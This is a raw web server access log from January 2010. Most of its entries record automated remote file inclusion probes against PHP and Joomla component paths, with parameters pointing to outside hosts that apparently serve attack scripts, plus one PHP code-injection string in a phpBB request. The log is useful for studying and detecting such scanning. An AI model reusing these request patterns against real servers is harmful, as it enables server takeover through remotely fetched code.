218.38.12.14 - - [25/Jan/2010:05:43:02 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.212.146 - - [25/Jan/2010:05:43:18 -0800] "GET /logs/access_090810.log//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.212.146 - - [25/Jan/2010:05:43:18 -0800] "GET /logs/access_090803.log//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [25/Jan/2010:05:43:36 -0800] "GET /logs/access.log%20%20//com_dbquery/compon/administrator/bbs/write_comment_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [25/Jan/2010:05:43:36 -0800] "GET /logs//com_dbquery/compon/administrator/bbs/write_comment_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [25/Jan/2010:05:43:36 -0800] "GET /com_dbquery/compon/administrator/bbs/write_comment_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [25/Jan/2010:05:44:16 -0800] "GET /logs//com_dbquery/compon/administrator/bbs/write_comment_update.php?board_skin_path=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [25/Jan/2010:05:44:16 -0800] "GET /com_dbquery/compon/administrator/bbs/write_comment_update.php?board_skin_path=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [25/Jan/2010:05:44:16 -0800] "GET /logs/access.log%20%20//com_dbquery/compon/administrator/bbs/write_comment_update.php?board_skin_path=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.80.193.27 - - [25/Jan/2010:05:45:02 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; ZangoToolbar 4.8.3)" "www.galf.org"
94.23.212.146 - - [25/Jan/2010:05:46:09 -0800] "GET /logs//administrator/components/com_extcalendar/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.212.146 - - [25/Jan/2010:05:46:09 -0800] "GET /administrator/components/com_extcalendar/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.212.146 - - [25/Jan/2010:05:46:09 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_extcalendar/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.202.168.79 - - [25/Jan/2010:05:48:41 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "galf.org"
209.202.168.79 - - [25/Jan/2010:05:48:42 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "galf.org"
221.143.40.35 - - [25/Jan/2010:05:49:01 -0800] "GET /logs/access.log//com_dbquery/compon/administrator/bbs/write_comment_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.12.14 - - [25/Jan/2010:05:49:36 -0800] "GET /logs/access_090720.log//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:05:49:52 -0800] "GET /logs/access_090817.log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.0" 404 - "-" "-" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:05:50:01 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:05:50:01 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:51:00 -0800] "GET /logs/access_090720.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:51:04 -0800] "GET /logs/access_090720.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [25/Jan/2010:05:51:27 -0800] "GET /components/com_galleria///bbs///write_comment_update.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [25/Jan/2010:05:51:27 -0800] "GET /logs//components/com_galleria///bbs///write_comment_update.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [25/Jan/2010:05:51:38 -0800] "GET /logs/access_091130.log//components/com_galleria///bbs///write_comment_update.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:51:49 -0800] "GET /logs/access_090720.log//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:53:13 -0800] "GET /logs/access_090810.log//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:53:36 -0800] "GET /logs/access_090921.log//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:54:08 -0800] "GET /logs/access_090720.log//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:05:54:11 -0800] "GET /logs/access_090720.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:05:54:11 -0800] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:05:54:11 -0800] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.132 - - [25/Jan/2010:05:54:44 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
94.23.212.146 - - [25/Jan/2010:05:55:33 -0800] "GET /logs/access_090810.log//administrator/components/com_extcalendar/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:55:43 -0800] "GET /logs/access_090810.log//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:56:23 -0800] "GET /logs/access_090921.log//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:05:56:24 -0800] "GET /logs/access_090720.log//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.132 - - [25/Jan/2010:05:56:37 -0800] "GET / HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
94.23.212.146 - - [25/Jan/2010:05:56:51 -0800] "GET /logs/access_090803.log//administrator/components/com_extcalendar/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:06:04:01 -0800] "GET /logs/access.log//write_update.php?mosConfig_absolute_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:06:04:01 -0800] "GET /write_update.php?mosConfig_absolute_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:06:04:01 -0800] "GET /logs//write_update.php?mosConfig_absolute_path=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:06:04:41 -0800] "GET /logs/access_090817.log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:06:04:45 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:06:04:46 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.202.168.79 - - [25/Jan/2010:06:06:23 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "galf.org"
69.175.14.226 - - [25/Jan/2010:06:08:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:06:08:17 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:06:08:19 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:06:08:19 -0800] "GET /logs/access_090921.log%20%20/playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:06:08:19 -0800] "GET /playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:08:37 -0800] "GET /logs/access_090921.log%20%20/playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:08:37 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:08:37 -0800] "GET /playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.202.168.74 - - [25/Jan/2010:06:08:41 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
209.202.168.74 - - [25/Jan/2010:06:08:42 -0800] "GET /logs/access_090928.log HTTP/1.0" 200 524288 "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:08:56 -0800] "GET /playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:08:56 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:08:56 -0800] "GET /logs/access_090921.log/playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [25/Jan/2010:06:09:11 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
195.190.166.35 - - [25/Jan/2010:06:09:11 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:06:09:12 -0800] "GET /logs/access_090921.log%20%20/playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:06:09:12 -0800] "GET /playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:06:09:12 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:09:19 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.frentesdeseguridad.gov.co/administrator/backups/image/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:09:19 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.frentesdeseguridad.gov.co/administrator/backups/image/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:09:24 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.frentesdeseguridad.gov.co/administrator/backups/image/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [25/Jan/2010:06:10:39 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
72.55.146.200 - - [25/Jan/2010:06:10:39 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
72.55.146.200 - - [25/Jan/2010:06:10:39 -0800] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:06:11:07 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:06:11:08 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:12:20 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:12:20 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:12:21 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:12:24 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:12:24 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:12:25 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [25/Jan/2010:06:14:05 -0800] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
209.202.168.79 - - [25/Jan/2010:06:15:17 -0800] "GET /logs/access.log HTTP/1.0" 200 393862 "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "galf.org"
69.175.14.226 - - [25/Jan/2010:06:15:22 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
69.175.14.226 - - [25/Jan/2010:06:15:22 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
222.122.158.155 - - [25/Jan/2010:06:17:29 -0800] "GET /logs/access.log%20%20/?sourcedir=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.158.155 - - [25/Jan/2010:06:17:29 -0800] "GET /?sourcedir=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
222.122.158.155 - - [25/Jan/2010:06:17:29 -0800] "GET /logs/?sourcedir=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "galf.org"
222.122.158.155 - - [25/Jan/2010:06:19:49 -0800] "GET /?sourcedir=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:06:19:49 -0800] "GET /logs/?sourcedir=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:06:19:59 -0800] "GET /logs/access_090720.log/?sourcedir=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:23:07 -0800] "GET /logs/access_090622.log//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:23:07 -0800] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:23:07 -0800] "GET /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:06:25:46 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
139.146.140.227 - - [25/Jan/2010:06:25:46 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
139.146.140.227 - - [25/Jan/2010:06:25:46 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [25/Jan/2010:06:25:54 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:06:25:54 -0800] "GET /logs/access_091102.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:06:25:54 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [25/Jan/2010:06:25:58 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [25/Jan/2010:06:25:58 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [25/Jan/2010:06:25:58 -0800] "GET /bbs/write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:06:26:00 -0800] "GET /logs/access_091102.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:06:26:00 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:06:26:00 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
